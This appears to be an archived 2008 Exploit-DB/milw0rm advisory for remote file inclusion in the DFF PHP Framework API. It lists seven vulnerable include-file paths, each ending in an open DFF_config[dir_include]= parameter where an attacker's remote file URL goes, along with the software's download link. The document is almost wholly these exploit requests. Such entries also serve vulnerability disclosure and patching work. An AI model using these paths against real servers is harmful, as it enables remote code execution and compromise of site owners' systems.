DFF PHP Framework API - 'Data Feed File' Remote File Inclusion

EDB-ID:

6700

Author:

GoLd_M

Type:

webapps

Platform:

PHP

Published:

2008-10-08

# DFF PHP Framework API (Data Feed File) Multiple Inclusion Vulnerabilities
# Script :http://opensource.datafeedfile.com/download/DFF_PHP_FrameworkAPI-latest.zip
# Exploits :
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=
#         /DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=
# Tryag.cc/cc

# milw0rm.com [2008-10-08]